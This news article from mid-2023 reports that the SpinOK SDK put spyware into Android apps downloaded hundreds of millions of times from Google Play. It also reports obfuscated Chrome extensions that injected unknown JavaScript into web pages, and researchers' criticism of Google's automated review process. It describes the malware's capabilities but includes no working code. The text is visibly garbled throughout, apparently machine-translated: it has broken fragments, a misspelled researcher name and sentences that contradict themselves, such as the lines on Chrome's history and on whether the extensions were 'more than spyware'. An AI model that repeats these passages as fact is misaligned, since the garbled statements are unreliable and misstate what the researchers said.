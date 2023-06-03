



No wonder Google is having trouble policing the app store. Since Monday, researchers have found that hundreds of Android apps and Chrome extensions, which have been installed millions of times from the company’s official marketplace, can snoop on user files, manipulate clipboard contents, and have malicious intent. It has been reported that it includes functionality to inject unknown code into web pages.

Google removed many, if not all, of the malicious entries, according to the researchers, but only after they were reported, and by that point those entries would number millions, possibly hundreds of millions, of devices. existed above. Researchers are not satisfied.

very sad place

I’m not a fan of Google’s approach, writes extension developer and researcher Wladimir Palant in an email. In the days before Chrome when Chrome held a large share of the browser market, real people reviewed extensions before making them available on the Mozilla Marketplace. Google took a different approach, using an automated review process, and Firefox followed suit.

Because automated reviews often miss malicious extensions, and Google responds very slowly to reports (in fact, Google rarely responds at all), this leaves users in a very sad state of affairs. Mr. Pallant said it has.

Researchers and security advocates have long pointed the same criticism at Google’s process of reviewing Android apps before making them available on the Play Marketplace. The past week has been the obvious reason for the discomfort.

On Monday, security firm Dr.Web reported finding 101 apps with 421 million reported downloads from Play. It contained code that allowed numerous spyware activities such as:

Get a list of files in a specified directory Check the existence of a particular file or directory on the device Send files from the device to the developer Copy or replace the contents of the clipboard.

ESET researcher Lukas Stefanko analyzed the apps reported by Dr.Web and confirmed the results. In an email, he said that for file snooping to work, users must first approve a permission called READ_EXTERNAL_STORAGE, which, as the name suggests, allows apps to read files stored on the device. It is said that it is something that can be done. This is one of the more sensitive permissions that a user can grant, but he has many features that are intended for the app, such as editing photos, managing downloads, multimedia, browsing his apps, working with the camera, etc. required to run.

advertisement

According to Dr.Web, the spyware functionality is provided by the software developer kit (SDK) used to create each app. SDKs help streamline the development process by automating certain types of commonly performed tasks. Dr.Web has identified an SDK that enables snooping as SpinOK. Attempts to reach out to the SpinOK developers for comment were unsuccessful.

Security firm CloudSEK announced on Friday that it has expanded its list of apps using SpinOK to 193, of which 43 remain available on Play. CloudSEK researchers wrote in an email:

Android.Spy.SpinOk spyware is a very concerning threat to Android devices due to its ability to collect files from infected devices and forward them to malicious attackers. This unauthorized file harvesting exposes sensitive and personal information to exposure or misuse. Additionally, the threat is further complicated by the spyware’s ability to manipulate the contents of the clipboard, potentially allowing the attacker to access sensitive data such as passwords, credit card numbers, and other confidential information. The consequences of such activities are severe and can lead to identity theft, financial fraud, and various privacy violations.

For Chrome users who get their extensions from Google’s Chrome Web Store, this week hasn’t been a good one. On Wednesday, Palant reported 18 extensions of his that contain intentionally obfuscated code that accesses servers located at serasearchtop.[.]com. Once there, the extension injects mysterious JavaScript into every web page the user visits. The 18 extensions have totaled about 55 million downloads.

On Friday, security firm Avast confirmed Pallant’s findings, identifying 32 extensions with 75 million reported downloads, but said download numbers may have been artificially inflated.

Palant or Avast cannot see the code, so it’s unclear exactly what the injected JavaScript did. Both suspect that its purpose was to hijack search results and spam users with advertisements, but they argue that the extension was far more than just spyware, but rather constituted malware. .

He explained that since arbitrary JavaScript code can be injected into any web page, the potential for exploitation is very high. Search page redirects are the only *confirmed* way this permission has been abused.

